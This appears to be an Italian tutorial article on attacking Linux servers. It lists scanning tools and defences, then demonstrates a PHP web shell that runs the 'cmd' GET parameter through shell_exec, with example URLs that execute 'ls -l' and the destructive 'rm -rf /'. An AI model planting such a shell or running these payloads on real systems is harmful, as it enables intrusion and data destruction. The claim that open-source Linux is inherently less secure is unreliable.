Hacking del sistema operativo Linux: Hacking con Ubuntu (esercitazione sui comandi)

Linux è il sistema operativo per server più utilizzato, in particolare per i server web. È open source; questo significa che chiunque può avere accesso al codice sorgente. Ciò lo rende meno sicuro rispetto ad altri sistemi operativi poiché gli aggressori possono studiare il codice sorgente per trovare le vulnerabilità . Linux for Hackers riguarda lo sfruttamento di queste vulnerabilità per ottenere l’accesso non autorizzato a un sistema.

In questo articolo, ti presenteremo cos’è Linux, le sue vulnerabilità di sicurezza, l’hacking con Ubuntu e le contromisure che puoi mettere in atto.

Nota rapida su Linux

Linux è un sistema operativo open source . Esistono molte distribuzioni di sistemi operativi basati su Linux come Redhat, Fedora e Ubuntu, ecc. A differenza di altri sistemi operativi, Linux è meno sicuro quando si tratta di sicurezza. Questo perché il codice sorgente è disponibile gratuitamente, quindi è facile studiarlo per le vulnerabilità e sfruttarle rispetto ad altri sistemi operativi che non sono open source. Linux può essere utilizzato come sistema operativo server, desktop, tablet o dispositivo mobile.

I programmi Linux possono essere gestiti utilizzando la GUI o i comandi. I comandi Linux per l’hacking di Kali Linux sono più efficaci ed efficienti rispetto all’utilizzo della GUI. Per questo motivo, è utile conoscere i comandi di base di Linux per l’hacking.

Fare riferimento a questi tutorial https://www.guru99.com/unix-linux-tutorial.html su come iniziare con gli hack di Kali Linux.

Strumenti per hackerare Linux

  • Nessus : questo strumento può essere utilizzato per l’hacking di Ubuntu, la scansione delle impostazioni di configurazione, le patch e le reti, ecc. Può essere trovato su https://www.tenable.com/products/nessus
  • NMappa. Questo strumento può essere utilizzato per monitorare gli host in esecuzione sul server e i servizi che stanno utilizzando. Può anche essere usato per cercare le porte. Può essere trovato su https://nmap.org/
  • SARA – SARA è l’acronimo di Security Auditor’s Research Assistant. Come suggerisce il nome, questo strumento può essere utilizzato per controllare le reti contro minacce come SQL Injection, XSS ecc. Può essere trovato su http://www-arc.com/sara/sara.html

L’elenco di cui sopra non è esaustivo; ti dà un’idea degli strumenti disponibili per l’hacking di Ubuntu e l’hacking dei sistemi Linux.

Come prevenire gli hack di Linux

Linux Hacking sfrutta le vulnerabilità del sistema operativo. Un’organizzazione può adottare la seguente politica per proteggersi da tali attacchi.

  • Gestione delle patch: le patch risolvono i bug che gli aggressori sfruttano per compromettere un sistema. Una buona politica di gestione delle patch ti assicurerà di applicare costantemente le patch pertinenti al tuo sistema.
  • Configurazione corretta del sistema operativo : altri exploit sfruttano i punti deboli nella configurazione del server. I nomi utente e i demoni inattivi dovrebbero essere disabilitati. È necessario modificare le impostazioni predefinite come password comuni per l’applicazione, nomi utente predefiniti e alcuni numeri di porta.
  • Sistema di rilevamento delle intrusioni : tali strumenti possono essere utilizzati per rilevare l’accesso non autorizzato al sistema. Alcuni strumenti hanno la capacità di rilevare e prevenire tali attacchi.

Attività di hacking: hackerare un sistema Ubuntu Linux usando PHP

In questo scenario pratico, impareremo come hackerare con Ubuntu e ti forniremo le informazioni di base su come puoi usare PHP per compromettere un Linux. Non prenderemo di mira nessuna vittima. Se vuoi provarlo, puoi installare LAMPP sul tuo computer locale.

PHP è dotato di due funzioni che possono essere utilizzate per eseguire comandi di hacking di Linux. Ha le funzioni exec() e shell_exec(). La funzione exec() restituisce l’ultima riga dell’output del comando mentre shell_exec() restituisce l’intero risultato del comando come stringa.

A scopo dimostrativo, supponiamo che i gestori dell’attaccante carichino il seguente file su un server web.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "esecuzione del comando shell:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

QUI,

Lo script precedente ottiene il comando dalla variabile GET denominata cmd. Il comando viene eseguito utilizzando shell_exec() e i risultati vengono restituiti nel browser.

Il codice sopra può essere sfruttato utilizzando il seguente URL

http://localhost/cp/konsole.php?cmd=ls%20-l

QUI,

  • “…konsole.php?cmd=ls%20-l” assegna il valore ls –l alla variabile cmd .

Il comando in Ubuntu per l’hacking contro il server verrà eseguito come

shell_exec('ls -l') ;

L’esecuzione del codice precedente su un server Web fornisce risultati simili ai seguenti.

Hacking di sistemi Linux

Il comando sopra mostra semplicemente i file nella directory corrente e i permessi

Supponiamo che l’attaccante passi il seguente comando

rm-rf /

QUI,

  • “rm” rimuove i file
  • “rf” fa eseguire il comando rm in modalità ricorsiva. Eliminazione di tutte le cartelle e i file
  • “/” indica al comando di iniziare a eliminare i file dalla directory principale

L’URL dell’attacco sarebbe simile a questo

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Sommario

  • Linux è un popolare sistema operativo per server, desktop, tablet e dispositivi mobili.
  • Linux è open source e il codice sorgente può essere ottenuto da chiunque. In questo modo è facile individuare le vulnerabilità. È uno dei migliori sistemi operativi per hacker.
  • I comandi di hacking di base e di rete in Ubuntu sono preziosi per gli hacker di Linux.
  • Le vulnerabilità sono una debolezza che può essere sfruttata per compromettere un sistema.
  • Una buona sicurezza può aiutare a proteggere un sistema dalla compromissione da parte di un utente malintenzionato.
Posts created 107

Related Posts

Begin typing your search term above and press enter to search. Press ESC to cancel.

Back To Top